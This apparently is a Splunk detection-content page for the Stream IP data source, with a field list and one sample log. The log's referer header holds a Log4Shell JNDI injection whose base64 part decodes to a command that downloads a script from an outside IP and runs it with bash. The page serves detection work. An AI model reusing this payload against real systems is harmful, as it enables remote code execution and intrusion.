<span class="pill kill-chain">_time</span>
<span class="pill kill-chain">action</span>
<span class="pill kill-chain">app</span>
<span class="pill kill-chain">bytes</span>
<span class="pill kill-chain">bytes_in</span>
<span class="pill kill-chain">bytes_out</span>
<span class="pill kill-chain">category</span>
<span class="pill kill-chain">date_hour</span>
<span class="pill kill-chain">date_mday</span>
<span class="pill kill-chain">date_minute</span>
<span class="pill kill-chain">date_month</span>
<span class="pill kill-chain">date_second</span>
<span class="pill kill-chain">date_wday</span>
<span class="pill kill-chain">date_year</span>
<span class="pill kill-chain">date_zone</span>
<span class="pill kill-chain">dest</span>
<span class="pill kill-chain">dest_ip</span>
<span class="pill kill-chain">dest_port</span>
<span class="pill kill-chain">eventtype</span>
<span class="pill kill-chain">host</span>
<span class="pill kill-chain">http_content_type</span>
<span class="pill kill-chain">http_method</span>
<span class="pill kill-chain">http_referer</span>
<span class="pill kill-chain">http_referrer</span>
<span class="pill kill-chain">http_user_agent</span>
<span class="pill kill-chain">http_user_agent_length</span>
<span class="pill kill-chain">http_x_forwarded_for</span>
<span class="pill kill-chain">http_x_header</span>
<span class="pill kill-chain">https</span>
<span class="pill kill-chain">index</span>
<span class="pill kill-chain">linecount</span>
<span class="pill kill-chain">nginx_version</span>
<span class="pill kill-chain">product</span>
<span class="pill kill-chain">protocol</span>
<span class="pill kill-chain">punct</span>
<span class="pill kill-chain">request_time</span>
<span class="pill kill-chain">response_time</span>
<span class="pill kill-chain">server</span>
<span class="pill kill-chain">site</span>
<span class="pill kill-chain">source</span>
<span class="pill kill-chain">sourcetype</span>
<span class="pill kill-chain">splunk_server</span>
<span class="pill kill-chain">src</span>
<span class="pill kill-chain">src_ip</span>
<span class="pill kill-chain">status</span>
<span class="pill kill-chain">status_description</span>
<span class="pill kill-chain">status_type</span>
<span class="pill kill-chain">tag</span>
<span class="pill kill-chain">tag::eventtype</span>
<span class="pill kill-chain">time_local</span>
<span class="pill kill-chain">timeendpos</span>
<span class="pill kill-chain">timestartpos</span>
<span class="pill kill-chain">uri_path</span>
<span class="pill kill-chain">url</span>
<span class="pill kill-chain">url_domain</span>
<span class="pill kill-chain">url_length</span>
<span class="pill kill-chain">vendor</span>
<span class="pill kill-chain">vendor_product</span>
<span class="pill kill-chain">version</span>
<span class="pill kill-chain">web_server</span>
</div>
Data Source: Splunk Stream IP
Description
Data source object for Splunk Stream IP
Details
| Property | Value |
|---|---|
| Source | stream:ip |
| Sourcetype | stream:ip |
Supported Apps
- Splunk Stream (version 8.1.3)
Event Fields
Fields
Example Log
1site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1" src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="14/Dec/2021:00:41:27 +0000" protocol="HTTP/1.1" status="400" bytes_out="262" bytes_in="196" http_referer="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]" http_user_agent="curl/7.58.0" nginx_version="1.21.3" http_x_forwarded_for="-" http_x_header="-" uri_query="-" uri_path="/" http_method="GET" response_time="0.004" cookie="-" request_time="0.004" category="application/json" https=""
Source: GitHub | Version: 1